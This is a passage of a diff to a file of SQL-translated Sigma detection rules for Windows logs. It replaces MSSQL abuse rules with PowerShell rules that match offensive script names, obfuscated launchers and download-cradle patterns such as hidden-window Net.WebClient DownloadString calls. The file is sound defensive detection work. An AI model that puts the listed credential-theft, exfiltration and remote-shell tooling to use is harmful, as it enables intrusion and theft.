'%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 